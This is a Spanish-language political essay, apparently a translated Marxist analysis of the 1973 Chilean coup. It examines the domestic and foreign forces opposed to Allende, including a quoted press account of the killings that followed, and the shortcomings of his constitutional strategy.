No se requiere nada muy espectacular: solo un rechazo individual a la legitimidad del régimen en nuestra vida diaria, lo que en sí mismo se transforma en una vasta y colectiva empresa dedicada a la producción de alteraciones.

Cabe suponer que la gran mayoría de los miembros de las clases alta y media (no todos, por cierto) serán irrevocablemente contrarios al nuevo régimen. La cuestión de la baja clase media es algo más compleja. El primer requisito en esta relación es hacer una distinción radical, por un lado, entre profesionales inferiores y oficinistas, técnicos, personal administrativo, etc., y por otro lado los pequeños capitalistas y microcomerciantes.

Los primeros son parte integral de aquel “trabajador colectivo” del cual Marx habló hace más de un siglo; y están involucrados, al igual que la clase obrera industrial, en la producción de excedentes. Esto no significa que esta clase o estrato se verá necesariamente a sí misma como parte de la clase obrera, o que automáticamente vaya a apoyar políticas de izquierda (ni siquiera la propia clase obrera); pero sí que existe por lo menos una sólida base para una alianza.

Es mucho más dudoso, de hecho muy probablemente sea falso, que esa base exista en la otra parte de la baja clase media, el pequeño empresario y el microcomerciante. En el artículo citado, Maurice Duverger sugiere que “la primera condición para la transición democrática al socialismo en un país occidental como Francia es que un gobierno de izquierda tranquilice a las clases medias acerca de su futuro bajo el nuevo régimen, de manera de disociarlas del núcleo de grandes capitalistas que están condenados a desaparecer o a someterse a un estricto control”.

El problema aquí radica en lo siguiente: si con clases medias se refieren a los pequeños capitalistas y microcomerciantes (y Duverger deja en claro que él lo considera así), el intento está condenado desde el comienzo. Pensando en ellos, Duverger quiere “que la evolución hacia el socialismo sea muy gradual y muy lenta, de manera de recuperar en cada etapa una parte sustancial de aquellos que tenían temor al principio”. Más aun, a las pequeñas empresas se les debe asegurar que su futuro será mejor que bajo el monopolio u oligopolio capitalista. Es interesante notar, y sería divertido si el asunto no fuera tan serio, que el realismo que el profesor Duverger es capaz de desplegar en relación con Chile lo abandona tan pronto como se acerca a casa.

Su escenario es ridículo; e incluso si no lo fuera no existe posibilidad de que a las pequeñas empresas puedan dárseles garantías apropiadas. No quisiera dar la impresión de estar promoviendo la quiebra de los medianos y pequeños kulaks urbanos de Francia: lo que digo es que adaptar la marcha de la transición al socialismo a las esperanzas y los temores de esta clase es promover la parálisis o prepararse para el fracaso. Mejor no empezar. Cómo manejar el problema es un tema aparte. Pero es importante empezar siendo consciente del hecho de que, como clase social o estrato, este elemento debe ser reconocido como parte de las fuerzas conservadoras.

Sin duda parece haber sido el caso en Chile, particularmente en relación con los ahora famosos 40 mil dueños de camiones, cuyas reiteradas huelgas incrementaron las dificultades del gobierno. Estas paralizaciones, muy bien coordinadas, y muy posiblemente subsidiadas por fuentes externas, ilustran el problema que un gobierno de izquierda debe esperar enfrentar, en mayor o menor medida dependiendo del país, en un sector de considerable importancia económica en términos de la distribución.

El problema, irónicamente, resalta aun más por el hecho de que, de acuerdo con estadísticas de Naciones Unidas, era esta clase media la que más había prosperado bajo el régimen de Allende en relación con la distribución del ingreso nacional.

En efecto, pareciera que el 50% más pobre de la población vio incrementarse su parte del total de 16,1% a 17,6%; que el ingreso de la clase media (45% de la población total) aumentó de 53,9% a 57,7%; mientras que el del 5% más rico de la población cayó de 30% a 24,7%.

Difícilmente esta es la imagen de una clase media oprimida hasta morir, y de ahí la importancia de su hostilidad.

(b) La intervención de fuerzas conservadoras externas

No es posible discutir la guerra de clases en ningún lugar, muchos menos en América Latina, sin tomar en consideración la intervención extranjera, más específicamente y de manera obvia la intervención del imperialismo estadounidense, representado tanto por intereses privados como por el mismo Estado norteamericano.

Las actividades de la ITT han recibido bastante publicidad, así como sus planes de hundir al país en el caos de manera de conseguir que los “militares amigos” llevaran a cabo un golpe de Estado. Por supuesto, la ITT no era la única gran empresa operando en Chile; de hecho, no había un sector importante de la economía chilena que no estuviese integrado, y en algunos casos dominado, por empresas estadounidenses, y su hostilidad hacia el régimen de Allende debe haber acrecentado en gran medida las dificultades económicas, sociales y políticas del gobierno.

Todo el mundo sabe que la balanza de pagos de Chile depende en gran medida de sus exportaciones de cobre: pero el precio mundial del metal rojo, que se había reducido casi a la mitad en 1970, permaneció a ese nivel hasta fines de 1972; Estados Unidos ejerció entonces una enorme presión mundial para que se interpusiera un embargo al cobre chileno.

Además, presionó fuertemente y con éxito al Banco Mundial para que este denegara préstamos y créditos a Chile, aunque no era necesaria demasiada presión, ya fuera en el Banco Mundial o en otras instituciones bancarias. Pocos días después del golpe, The Guardian señalaba que “los nuevos anticipos netos, congelados como resultado de la presión estadounidense, incluían sumas que totalizaban 30 millones de libras: todo para proyectos que el Banco Mundial ya había aprobado como dignos de respaldo”.

El presidente del Banco Mundial es por supuesto el señor Robert McNamara. Se dijo en su momento que el señor McNamara había experimentado algún tipo de conversión espiritual por el remordimiento que sentía, habiendo sido ministro de Defensa de Estados Unidos, al infligir tanto sufrimiento al pueblo vietnamita: bajo su dirección, el Banco Mundial iría efectivamente en ayuda de los países pobres.

Lo que omitían aquellos que intentaron convencernos de esta linda historia es que había una condición: los países pobres debían mostrar la mayor deferencia, y Chile no lo hacía, por las demandas de la empresa privada, particularmente de la empresa privada norteamericana.

Así, el régimen de Allende enfrentó, desde el comienzo, la implacable tentativa estadounidense de estrangular la economía. En comparación con este hecho –que debe considerarse en conjunto con el sabotaje realizado por los intereses económicos conservadores internos–, los errores cometidos por el régimen son relativamente de menor importancia, aun cuando se les echen a la cara vivamente, no solo sus críticos sino también los amigos del gobierno de Allende.

Lo verdaderamente extraordinario, contra tales probabilidades, no son los errores sino el hecho de que el régimen resistiera económicamente hasta el fin; tanto más cuanto que fue sistemáticamente obstaculizado por los partidos de oposición en el Congreso cuando quiso tomar las acciones necesarias.

Desde esta perspectiva, la cuestión de si el gobierno de Estados Unidos es- tuvo o no directamente involucrado en la preparación del golpe militar no es particularmente importante. Sabía del golpe antes que ocurriera, eso es seguro. El ejército chileno tenía vínculos cercanos con el ejército estadounidense. Y sería estúpido pensar que el tipo de personas que manejan el gobierno de Estados Unidos se restarían de una participación activa en un golpe, o de im pulsarlo. Sin embargo, lo importante aquí es que durante los tres años previos el gobierno de Estados Unidos hizo todo lo que estuvo en sus manos –en términos de una guerra económica en su contra– para preparar el camino para el derrocamiento del régimen de Allende.

(c) Los partidos políticos conservadores

El tipo de lucha de clases conducido por las fuerzas conservadoras en la sociedad civil al que hice referencia requiere de dirección y articulación política en último término, tanto en el Congreso como en todo el país, si es que va a transformarse en una fuerza política realmente efectiva. Esta dirección la proporcionan los partidos conservadores, y en Chile fue principalmente facilitada por la Democracia Cristiana.

Tal como la Unión Demócrata Cristiana en Alemania y el Partido Demócrata Cristiano en Italia, la Democracia Cristiana en Chile albergaba muchas tendencias en su interior, desde varias formas de radicalismo (aunque los más radicales se apartaron para formar sus propias agrupaciones tras el triunfo de Allende) hasta el conservadurismo extremo.

Pero representaba en esencia a la derecha constitucionalista, el partido del orden, una de cuyas figuras más emblemáticas, Eduardo Frei Montalva, había sido Presidente antes de Allende.

Con constante y creciente determinación, esta derecha constitucionalista buscó por todos los medios en su poder –del lado de la legalidad– bloquear las acciones del gobierno y evitar que funcionara adecuadamente. Los partidarios del parlamentarismo siempre dicen que el funcionamiento del sistema depende de que haya cierto grado de cooperación entre el gobierno y la oposición; y sin duda están en lo cierto.

Al gobierno de Allende le fue negada esta cooperación por la misma gente que nunca cesó de proclamar su adhesión a la democracia parlamentaria y al constitucionalismo. Aquí también, en el frente legislativo, la lucha de clases se transformó en guerra de clases.

Las asambleas legislativas son, con algunas reservas que no vienen al caso aquí, parte del sistema estatal; y en Chile el Congreso estaba sólidamente bajo el control de la oposición. También lo estaban otros importantes sectores del sistema estatal, a las que me referiré más adelante.

La resistencia de la oposición, en el Congreso y fuera de él, no asumió sus verdaderas dimensiones hasta la victoria alcanzada por la Unidad Popular en las elecciones de marzo de 1973. Ya en el otoño los antiguos constitucionalistas y parlamentaristas se habían lanzado al camino de la intervención militar.

Después del abortado golpe del 29 de junio, el “Tanquetazo”, que marca el comienzo de la crisis final, Allende trató de alcanzar un compromiso con los líderes de la Democracia Cristiana, Aylwin y Frei. Estos se rehusaron, y aumentaron la presión sobre el gobierno.

El 22 de agosto, la Cámara de Diputados, dominada por su partido, aprobó una moción que efectivamente llamaba a las Fuerzas Armadas a “poner término a las situaciones que constituían una violación a la Constitución”.

Por lo menos en el caso chileno, no hay dudas sobre la responsabilidad directa que cargan estos políticos en el derrocamiento del régimen de Allende.

Ciertamente los líderes de la Democracia Cristiana habrían preferido expulsar a Allende sin recurrir al uso de la fuerza, y dentro del marco de la Constitución. A los políticos burgueses no les gustan los golpes militares, en buena parte porque los privan de su rol. Pero les guste o no, y a pesar de lo empapados de constitucionalismo que puedan estar, la mayoría se volverá hacia los militares dondequiera que sientan que las circunstancias lo demandan.

Los cálculos que entran en juego en la decisión de que las circunstancias de- mandan recurrir a la ilegalidad son muchos y complejos. Incluyen presiones e instigaciones de diferentes tipos y calibres. Una de esas presiones es la presión general, difusa, de la clase o clases a las cuales estos políticos pertenecen.

Il faut en finir, se les dice desde todos los frentes, o mejor dicho desde los frentes a los que ellos prestan atención; y esto importa en la deriva hacia el golpismo. Pero otra presión, que se vuelve cada vez más importante en la medida en que la crisis aumenta, es la de los grupos a la derecha de los conservadores constitucionalistas, que en tales circunstancias pasan a ser un elemento que importa.

(d) Agrupaciones de tipo fascista

El régimen de Allende tuvo que enfrentar la violencia organizada de agrupaciones fascistas. Esta actividad de guerrilla del ala más extremista de la derecha creció hasta asumir proporciones febriles en los meses previos al golpe; implicó el estallido de instalaciones eléctricas, ataques a militantes de izquierda y otras acciones de ese orden que contribuyeron enormemente a la sensación general de que de alguna manera había que poner fin a la crisis.

Aquí también, acciones de este tipo, en circunstancias “normales” de conflicto de clases, no tienen un significado político muy importante, ciertamente no el de amenazar a un régimen o siquiera dejar muchas marcas en él; si el grueso de las fuerzas conservadoras permanecen en el ámbito constitucionalista, las agrupaciones de tipo fascista permanecen aisladas, incluso la derecha tradicional las rehúye.

Pero, en circunstancias excepcionales, uno se relaciona con gente con la que de otro modo nunca sería visto ni muerto en la misma habitación; uno asiente y da un guiño donde antes un ceño fruncido y una reprimenda hubieran sido casi la respuesta automática.

“Son jóvenes”, dicen ahora con indulgencia los adultos conservadores. “Por supuesto, son salvajes y hacen cosas lamentables. Pero mira a quién atacan, y qué esperas cuando tienes un gobierno de demagogos, criminales y ladrones.” Así que grupos como Patria y Libertad operaron más y más audazmente en Chile, ayudaron a acrecentar la sensación de crisis y alentaron a los políticos a pensar en términos de soluciones drásticas para acabar con ella.

(e) Oposición administrativa y judicial

Las fuerzas conservadoras en cualquier parte pueden siempre contar con el apoyo, la aquiescencia o la simpatía más o menos explícitos de los escalones superiores del sistema público; y es más, de muchos, si no la mayoría, de los miembros de los escalones inferiores también.

Por origen social, educación, estatus, vínculos de parentesco y amistad, los escalones superiores, para enfocarnos en ellos, son parte intrínseca del campo conservador; y si ninguno de estos factores sirviera, seguramente algunas disposiciones ideológicas los ubicarían allí. Los funcionarios públicos de alto rango y miembros del Poder Judicial pueden, en términos ideológicos, estar entre el liberalismo moderado y el conservadurismo extremo, pero el liberalismo moderado, en su cara más progresista, es el último extremo del espectro.

En condiciones “normales” de conflicto social, esta situación puede no encontrar una gran expresión excepto en términos del tipo de sesgo implícito o explícito que se espera de esa gente. Pero en condiciones de crisis, cuando la lucha de clases adquiere el carácter de guerra de clases, estos miembros del aparato estatal pasan a ser activos participantes en la batalla, y lo más probable es que quieran aportar su grano de arena al esfuerzo patriótico para salvar a su amado país –ni hablar de sus amados cargos– de los peligros que los acechan.

El régimen de Allende heredó un personal que por largos años había trabajado bajo las órdenes de partidos conservadores, y que no puede haber incluido a mucha gente que viera al nuevo régimen con algún tipo de simpatía. Buena parte de eso cambió con la renovación de personal en cargos de alto rango que impuso el nuevo gobierno, pero aun así, y quizás inevitablemente, dadas las circunstancias, los mandos medios y bajos continuaron siendo ocupados por burócratas tradicionales y establecidos.

El poder de esa gente puede llegar a ser muy grande. Puede venir una orden desde lo alto, pero ellos están en buena posición para hacer que no avance, o que no avance lo suficiente. Para variar la metáfora, la máquina no responde apropiadamente porque los mecánicos a su cargo no tienen un particular deseo de que funcione como se debe. A mayor sensación de crisis, menos voluntad tienen los mecánicos; y mientras menos voluntad tienen, mayor es la crisis.

A pesar de todo, el régimen de Allende no “colapsa”. A pesar de la obstrucción legislativa, el sabotaje administrativo, la guerra política, la intervención extranjera, los recortes económicos, las divisiones internas; a pesar de todo esto, el régimen aguanta.

Ese, para los políticos y las clases que estos representaban, era el problema.

En un artículo que en este momento quiero comentar, Eric Hobsbawm señala acertadamente: “para aquellos comentaristas de la derecha que se preguntan qué otra opción les quedaba a los opositores de Allende más que un golpe, la respuesta es simple: no hacer un golpe”.

Esto, sin embargo, significaba incurrir en el riesgo de que Allende pudiera zafarse de las dificultades que enfrentaba. De hecho, pareciera que, el día previo al golpe, él y sus ministros habían decidido hacer uso de un último recurso constitucional, un plebiscito, que sería anunciado el 11 de septiembre. Tenía esperanzas de que un triunfo plebiscitario hiciera que los golpistas se lo pensaran mejor, lo que le concedería nuevos espacios para la acción.

Si perdía, habría renunciado, con la esperanza de que las fuerzas de izquierda algún día estuvieran en un mejor pie para ejercer el poder. Cualquiera sea el juicio que se haga de esta estrategia, de la que los políticos conservadores deben haber tenido conocimiento, arriesgaba prolongar la crisis a la que estos estaban frenéticos por poner fin; y esto significó la aceptación –de hecho, el apoyo activo– del golpe de Estado que los militares habían estado preparando.

Al final, y de cara al peligro presentado por el respaldo popular a Allende, no quedaba más remedio: los asesinos debían ser convocados.


Soldados chilenos queman libros tras el golpe de Estado. David Burnett

(f) Los militares

Por supuesto se nos ha dicho, una y otra vez, que las Fuerzas Armadas en Chile, a diferencia de todos los otros países en Latinoamérica, eran políticamente neutrales, no deliberantes, constitucionalistas, etc.; y aunque el hecho se ha exagerado, en términos generales era cierto que los militares en ese país no “se mezclaban en política”.

Tampoco existen motivos para dudar de que en la época en que Allende llegó al poder, y durante un tiempo después, no querían intervenir y no pensaban en montar un golpe de Estado. Fue después de la aparición del “caos”, de la inestabilidad política extrema, y de que se revelara la debilidad en la respuesta del régimen a la crisis, que las fuerzas militares conservadoras entraron en acción, y entonces inclinaron la balanza decisivamente.

Pero sería desquiciado pensar que su “neutralidad” y “actitud apolítica” significaban que no tenían posturas ideológicas definidas, y que estas no eran definitivamente conservadoras.

Como señala Marcel Niedergang: “sea lo que sea que se haya dicho, nunca han existido oficiales de alto rango que fueran socialistas, para qué hablar de comunistas. Había dos grupos: los partidarios de la legalidad y los enemigos del gobierno de izquierda. Los segundos, cada vez más y más numerosos, fueron los que finalmente triunfaron”.

Las cursivas de la cita tienen la intención de transmitir la dinámica decisiva de los acontecimientos en Chile, y que afectó a los militares tanto como a todos los demás protagonistas. Esta noción de proceso dinámico es esencial para el análisis de cualesquiera de las situaciones dentro de esta clase: personas que son de tal modo, y que quieren o no quieren hacer esto o lo otro, cambian bajo el impacto de eventos que se suceden muy rápidamente.

Por supuesto, mayormente cambian dentro de un cierto margen de opciones, pero en tales situaciones de todos modos el cambio puede ser muy grande. Así, en ciertas situaciones los militares conservadores pero constitucionalistas se vuelven solo más conservadores: y esto quiere decir que dejan de ser constitucionalistas. La pregunta obvia es qué es lo que produjo el giro.

En parte, sin duda, la respuesta se encuentra en la situación “objetiva”, que se percibía como empeorando cada día; también en la presión generada por las fuerzas conservadoras. Pero en gran medida se debió a la postura que adoptó el gobierno en curso, y a cómo se percibió esa postura.

Como yo lo entiendo, la débil respuesta del gobierno de Allende al intento de golpe del 29 de junio, su constante retirada ante las fuerzas conservadoras (y los militares) en las semanas subsiguientes, y la pérdida que le significó la renuncia del general Prats, el único general que parecía firmemente preparado para mantenerse junto al régimen, todo esto debe haber tenido mucho que ver con el hecho de que los enemigos del gobierno dentro de las fuerzas armadas (o sea, los uniformados que estaban preparados para un golpe) se hicieran “más y más numerosos”.

En estas materias, hay una ley que se mantiene: mientras más débil es el gobierno, más audaces sus enemigos, y más numerosos se vuelven día tras día.

Así fue que aquellos generales constitucionalistas atacaron el 11 de septiembre, llevando a cabo la acción que habían etiquetado –de manera muy significativa a la luz de la masacre de los izquierdistas en Indonesia– como Operación Yakarta.

Antes de continuar con la siguiente parte de esta historia, aquella que concierne a las acciones del régimen allendista, su estrategia y dirección, es necesario recalcar la brutalidad de la represión desatada por el golpe militar, y subrayar la responsabilidad que les corresponde a los políticos conservadores en ella. Marx, escribiendo inmediatamente después de la Comuna de París, y mientras los comuneros continuaban siendo ejecutados, señalaba con amargura: “la civilización y justicia del orden burgués asoma en su espeluznante luz cada vez que los esclavos y burros de carga de ese orden se levantan contra sus amos. Entonces esta civilización y orden se presentan como manifiesto salvajismo y venganza sin ley”.

Sus palabras aplican bien al caso de Chile después del golpe. El semanario Newsweek, no precisamente un medio muy de izquierda, publicó una crónica de su corresponsal en Santiago poco después del golpe, titulado “Slaughterhouse in Santiago” (Matadero en Santiago), que decía lo siguiente:

«La semana pasada me colé por una puerta lateral de la morgue de la ciudad de Santiago, mostrando rápidamente mi credencial de prensa otorgada por la Junta con la impaciente autoridad de un alto oficial. Ciento cincuenta cadáveres yacían en el suelo del primer piso, esperando ser identificados por sus familias. Arriba, pasé por una puerta batiente y allí, en un mal iluminado pasillo había por lo menos otros cincuenta cuerpos, apretados unos con otros, sus cabezas contra la pared. Estaban todos desnudos.

La mayoría habían sido ejecutados con un tiro a corta distancia bajo la barbilla. Algunos tenían el cuerpo ametrallado. Sus pechos habían sido abiertos y luego grotescamente cosidos en lo que presumiblemente haya sido una autopsia pro-forma. Todos eran jóvenes y, a juzgar por la aspereza de sus manos, de la clase obrera. Un par de ellos eran mujeres, distinguibles entre la masa de cuerpos solo por las curvas de sus pechos. La mayoría de las cabezas habían sido aplastadas. Permanecí allí por unos dos minutos a lo sumo, luego me fui.

Los funcionarios de la morgue han sido advertidos de que serán enjuiciados por una corte marcial y ejecutados en caso de que revelen lo que ocurre allí adentro. Pero las mujeres que entran a ver los cuerpos dicen que hay entre cien y ciento cincuenta en el primer piso todos los días. Y yo pude obtener un recuento oficial de la morgue de manos de la hija de un funcionario: ella me dijo que, a catorce días del golpe, la morgue había recibido y procesado dos mil setecientos noventa y seis cadáveres”.

El mismo día en que apareció esta crónica, el Times de Londres comentaba en un editorial que “la existencia de una guerra o algo muy parecido explica claramente la drástica severidad del nuevo régimen, lo que ha tomado por sorpresa a muchos observadores”.

La “guerra” era por supuesto una invención de The Times. Habiéndola inventado, continuó observando que “un gobierno militar enfrentado a una vasta oposición armada (¿?) es poco probable que sea muy puntilloso con las finuras constitucionales o incluso con los derechos humanos básicos”.

Pero, por si acaso se cree que el Times aprobaba la “drástica severidad” del nuevo régimen, el periódico decía a sus lectores que “debe permanecer viva la esperanza de los amigos de Chile en el extranjero, como sin duda de la gran mayoría de los chilenos, de que los derechos humanos pronto serán plenamente respetados y que el gobierno constitucional será restablecido a la brevedad”. Amén.

Nadie sabe cuánta gente ha sido asesinada en el terror que siguió al golpe, ni cuánta gente todavía va a morir como resultado de él. Si un gobierno de izquierda hubiese mostrado una décima parte de la crueldad de la junta militar, llamativos titulares en todo el mundo “civilizado” lo habrían denunciado día por medio. Tal como está, el asunto fue rápidamente pasado por alto y con suerte sonó el crujido de una semilla cuando el gobierno británico se apresuró, once días después del golpe, a reconocer a la Junta. Lo mismo hicieron otros gobiernos occidentales amantes de la libertad.

Podemos entender que la gente pudiente en Chile compartiera, y más que compartiera, los sentimientos del editor del Times de Londres en relación a que, dadas las circunstancias, no podría esperarse que los militares fueran “muy puntillosos”.

Aquí también, Hobsbawm lo explica claro cuando dice: «en general, la izquierda ha subestimado el temor y el odio de la derecha, la facilidad con que los hombres y mujeres bien vestidos adquieren el gusto por la sangre”.

Esta es una vieja historia. En su Flaubert, Sartre cita una entrada del diario de Edmond de Goncourt del 31 de mayo de 1871, inmediatamente después de que la Comuna de París había sido aplastada:

«Está bien. No ha habido conciliación ni compromiso. La solución ha sido brutal. Ha sido pura fuerza (…) un baño de sangre tal como este, al ejecutar a la parte militante de la población [“la partie bataillante de la population”], posterga por una generación la nueva revolución. Son veinte años de tranquilidad los que la vieja sociedad tiene por delante si las autoridades se atreven a todo lo que hay que atreverse en este momento».

Goncourt, como bien sabemos, no tenía necesidad de preocuparse. Tampoco la clase media chilena, si los militares no solo se atreven sino si son capaces –esto es, si se les permite– de dar a Chile “veinte años de tranquilidad”. Una periodista con una larga experiencia en Chile reporta, tres semanas después del golpe, el “júbilo” de sus amigas de clase alta que habían rogado mucho tiempo por que se produjera el golpe.

Probablemente estas damas no se preocuparán demasiado por la masacre de los militantes de izquierda. Tampoco lo harán sus esposos.

Lo que al parecer preocupa a los políticos conservadores ha sido la meticulosidad con que los militares han actuado para restaurar “la ley y el orden”. Perseguir y disparar a los militantes es una cosa, como lo es la quema de libros y la intervención de las universidades. Pero disolver el Congreso, censurar la política y juguetear con la idea de un Estado “corporativista” del tipo fascista, como algunos de los generales están haciendo, es otra cosa, y bastante más seria. De modo que los líderes de la Democracia Cristiana, que tuvieron un papel muy relevante en azuzar a los militares, y que continúan manifestando su respaldo a la Junta, han comenzado sin embargo a expresar su “inquietud” por algunas de sus inclinaciones.

El expresidente Frei, un tipo resuelto, ha llegado a decir confidencialmente a una periodista francesa su creencia de que “la Democracia Cristiana tendrá que pasarse a la oposición de aquí a dos o tres meses”, presumiblemente después de que las Fuerzas Armadas hayan sacrificado suficientes militantes izquierdistas».

Al estudiar el comportamiento y las declaraciones de hombres como estos, uno entiende mejor el desprecio salvaje que Marx expresaba hacia los políticos burgueses a quienes execró en sus escritos históricos. La estirpe no ha cambiado.

El costo de la conciliación

La configuración de las fuerzas conservadoras que he presentado en la sección previa es esperable que exista en cualquier democracia burguesa, por supuesto que no en las mismas proporciones o con exactos paralelos; pero el patrón de Chile no es único. Siendo este el caso, lo más importante es intentar un análisis lo más preciso posible de la respuesta del régimen de Allende al desafío que le fue impuesto por estas fuerzas.

Como suele ocurrir, y mientras haya y continúe habiendo controversias interminables en la izquierda sobre quién carga con la responsabilidad de lo que se hizo mal (si es que alguien la tiene), y si hubo algo más que pudo haberse hecho, habrá muy poca controversia sobre cuál fue de hecho la estrategia del régimen de Allende.

De hecho, no la hay, en la izquierda. Tanto los Sensatos como los Rabiosos de la Izquierda al menos están de acuerdo en que la estrategia de Allende era llevar a cabo una transición constitucional y pacífica al socialismo.

Los Sensatos de la Izquierda opinan que este era el único camino posible y deseable.

Los Rabiosos de la Izquierda afirman que ese era el camino al desastre. Resulta que estos tenían la razón; pero todavía está por verse si la tuvieron por las razones correctas. En cualquier caso, hay varias preguntas que aparecen aquí, que son muy importantes y muy complejas para responderlas con eslóganes. Son algunas de estas preguntas las que quisiera abordar ahora.

Para empezar por el comienzo: concretamente, con el modo en el que la llegada al poder –o al gobierno– de la izquierda debe ser concebido en las democracias burguesas. La mayor chance por lejos es que esto ocurra vía el éxito electoral de una coalición de comunistas, socialistas y otras agrupaciones de tendencias más o menos radicales.

¿La razón?

No es que no pueda haber una crisis, lo que abriría posibilidades de otro tipo (por ejemplo, el Mayo francés fue una crisis de esta índole), pero, sea por buenas o por malas razones, los partidos que debieran ser capaces de acceder al poder en este tipo de situaciones, específicamente las principales formaciones de la izquierda –en particular los partidos comunistas de Francia e Italia–, no tienen la menor intención de embarcarse en tal rumbo, y de hecho creen fuertemente que hacerlo invitaría al desastre y supondría un retraso del movimiento de la clase obrera durante generaciones por venir.

Su actitud podría cambiar si se dan circunstancias de un tipo que no se puede anticipar; por ejemplo, la clara inminencia o directamente el comienzo de un golpe de Estado derechista. Pero esto es especulación. Lo que no es especulación es que estas vastas formaciones, que comandan el apoyo al grueso de la clase obrera organizada, y que continuarán comandándola por mucho tiempo, están totalmente comprometidas con la obtención del poder –o del gobierno– por los medios electorales y constitucionales.

Fue también la posición de la coalición liderada por Allende en Chile.

Hubo un tiempo en que mucha gente de izquierda decía que, si una izquierda claramente comprometida con cambios económicos y sociales profundos estuviera en vías de ganar una elección, la derecha no lo permitiría; esto es, lanzaría un ataque preventivo por medio de un golpe.

Esta ha dejado de ser una visión moderna: correcta o incorrectamente se percibe que, en circunstancias “normales”, la derecha no estaría en condiciones de decidir si podría o no “permitir” que se realicen elecciones. Independientemente de lo que la derecha o el gobierno puedan hacer para influir en los resultados, la verdad es que no podrían arriesgarse a evitar que las elecciones se llevaran a cabo.

La visión actual de la extrema izquierda tiende a ser que, incluso si esto es así, y admitiendo que es probable que lo sea, todo triunfo electoral, por definición, está condenado y será estéril.

El argumento, o uno de los principales argumentos en los que se basa esta afirmación, es que el costo de la hazaña de una victoria electoral es demasiado alto en términos de acomodos, maniobras y compromisos, de “ingeniería electoral”. Me parece que hay más de esto que lo que los Hombres Sensatos de la Izquierda están dispuestos a conceder; pero no necesariamente tanto como sus oponentes insisten en que debe ser el caso.

Pocas cosas en estos asuntos se pueden establecer por definición. Tampoco tienen los oponentes al “camino electoral” mucho que ofrecer como alternativa en las democracias burguesas de sociedades capitalistas avanzadas; y tales alternativas, de la manera como se ofrecen, han probado hasta ahora no ser en absoluto atractivas para el grueso de la población de cuyo respaldo la realización de estas alternativas precisamente depende; y no existe una muy buena razón para creer que esto cambiará drásticamente en un futuro que deba ser tomado en cuenta.

En otras palabras, debe asumirse que, en países con esta clase de sistema político, es por la vía del triunfo electoral que las fuerzas de la izquierda se encontrarán en el gobierno. La pregunta realmente importante es qué sucede después. Porque, como Marx también lo señalara en tiempos de la Comuna de París, la victoria electoral solo nos da el derecho a gobernar, no el poder de gobernar.

A menos que uno dé por garantizado que este derecho a gobernar no puede, en estas circunstancias, de ninguna manera ser transmutado en el poder de gobernar, es en este punto que la izquierda enfrenta cuestiones complejas que hasta ahora solo ha sondeado de forma imperfecta: es aquí donde más fácilmente se han usado los lemas, la retórica y las palabras mágicas como substitutos por la dura trituradora de la deliberación política. Desde este punto de vista, Chile ofrece algunas pistas y “lecciones” extremadamente importantes de lo que debe, y quizás lo que no debe, hacerse.

La estrategia adoptada por las fuerzas de izquierda chilenas tuvo una característica no muy asociada a la coalición: específicamente, un alto grado de inflexibilidad. Quiero decir que Allende y sus aliados habían tomado decisiones sobre ciertas líneas de acción, y de inacción, bastante antes de llegar al gobierno.

Habían decidido proceder conforme a la Constitución, la legalidad y el gradualismo; y también, en este escenario, que harían todo lo posible por evitar la guerra civil. Habiendo tomado estas decisiones antes de tomar posesión del gobierno, se mantuvieron apegados a ellas hasta el fin, a pesar de los cambios en las circunstancias.

Pero puede ser que lo que era correcto y apropiado e inevitable en un comienzo se haya vuelto suicida en la medida en que la batalla se desarrollaba. Lo que está en cuestión aquí no es la oposición “reforma o revolución”: es que Allende y sus colaboradores estaban empeñados en una particular versión del modelo “reformista”, el que finalmente hizo imposible que pudieran responder al desafío que enfrentaban. Esto necesita una mayor elaboración.

Alcanzar la Presidencia por la vía electoral implica mudarse a una casa ocupada durante mucho tiempo por personas de distintas costumbres; de hecho implica cambiarse a una casa en la cual muchas habitaciones continúan ocupadas por esas personas.

En otras palabras, la victoria de Allende en las urnas permitió que la izquierda ocupara uno de los elementos del sistema estatal, el Poder Ejecutivo: un elemento extremadamente importante, quizás el más importante, pero obviamente no el único. Habiendo alcanzado esta victoria parcial, el Presidente y su gobierno iniciaron la tarea de realizar sus políticas “trabajando” el sistema del cual se habían convertido en una parte.

Al hacerlo, indudablemente contravinieron un principio esencial del canon marxista. Como escribió Marx en una famosa carta a Kugelmann en tiempos de la Comuna de París: “el próximo intento de la Revolución Francesa ya no será, como antes, transferir la máquina burocrática-militar de una mano a otra, sino hacerla pedazos, y esta es la condición preliminar para una verdadera revolución popular en el continente”.

Del mismo modo, en La guerra civil en Francia, Marx señala: la clase trabajadora no puede simplemente conservar la maquinaria estatal predefinida y manejarla para sus propios objetivos”, y procede a subrayar la naturaleza de la alternativa presagiada por la Comuna de París. Tanta era la importancia que Marx y Engels le atribuían a este asunto que, en el prefacio de la edición alemana de 1872 del Manifiesto comunista afirman que “la Comuna demostró especialmente una cosa”, que es la observación de Marx en La guerra civil en Francia que acabo de citar. Fue de estas observaciones que Lenin derivó la visión de que “destruir el Estado burgués” era la tarea esencial del movimiento revolucionario.

Yo he defendido en otro lugar que, en el sentido en el cual parece establecerse en El Estado y la revolución (y por ende, en La guerra civil en Francia), esto es, como establecimiento de una forma extrema de democracia asambleísta (o soviética) inmediatamente después de la revolución, como substituto del destruido Estado burgués, la noción constituye una proyección imposible que puede no tener una relevancia inmediata para ningún régimen revolucionario, y que ciertamente no la tuvo en la práctica leninista tras la revolución bolchevique; y es difícil culpar a Allende y sus colaboradores por no hacer algo que nunca tuvieron la intención de hacer en primer lugar, y culparlos en nombre de Lenin, quien ciertamente no mantuvo su promesa, y no podría haber mantenido su promesa, detallada en El Estado y la revolución.

Sin embargo, aunque sea desgraciadamente “revisionista” siquiera sugerirlo, puede haber otras posibilidades que son relevantes para la discusión de la práctica revolucionaria, y para la experiencia chilena, y que además difieren de la particular versión del “reformismo” adoptada por los líderes de la Unidad Popular.

Así, un gobierno empeñado en cambios mayores a nivel económico, social y político, en algunos aspectos cruciales, tiene ciertas posibilidades incluso si no contempla “destruir el Estado burgués”. Puede, por ejemplo, ser capaz de efectuar cambios muy considerables en la planta funcionaria de las distintas áreas del sistema estatal; y en la misma línea, puede comenzar a atacar y flanquear el aparato estatal existente por medio de una variedad de mecanismos políticos e institucionales. De hecho, si quiere sobrevivir debe hacerlo; y debe finalmente hacerlo con respecto al elemento más difícil de todos: los militares y la policía.

